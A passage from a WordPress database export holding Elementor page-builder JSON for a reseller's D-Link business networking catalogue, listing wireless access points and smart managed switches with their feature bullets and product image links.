Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7410,3387,'_elementor_version','2.5.14'),(7411,3387,'_elementor_edit_mode','builder'),(7414,3388,'_wp_page_template','template-fullwidth.php'),(7415,3388,'_elementor_template_type','post'),(7416,3388,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"240\",\"right\":\"240\",\"bottom\":\"240\",\"left\":\"240\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" 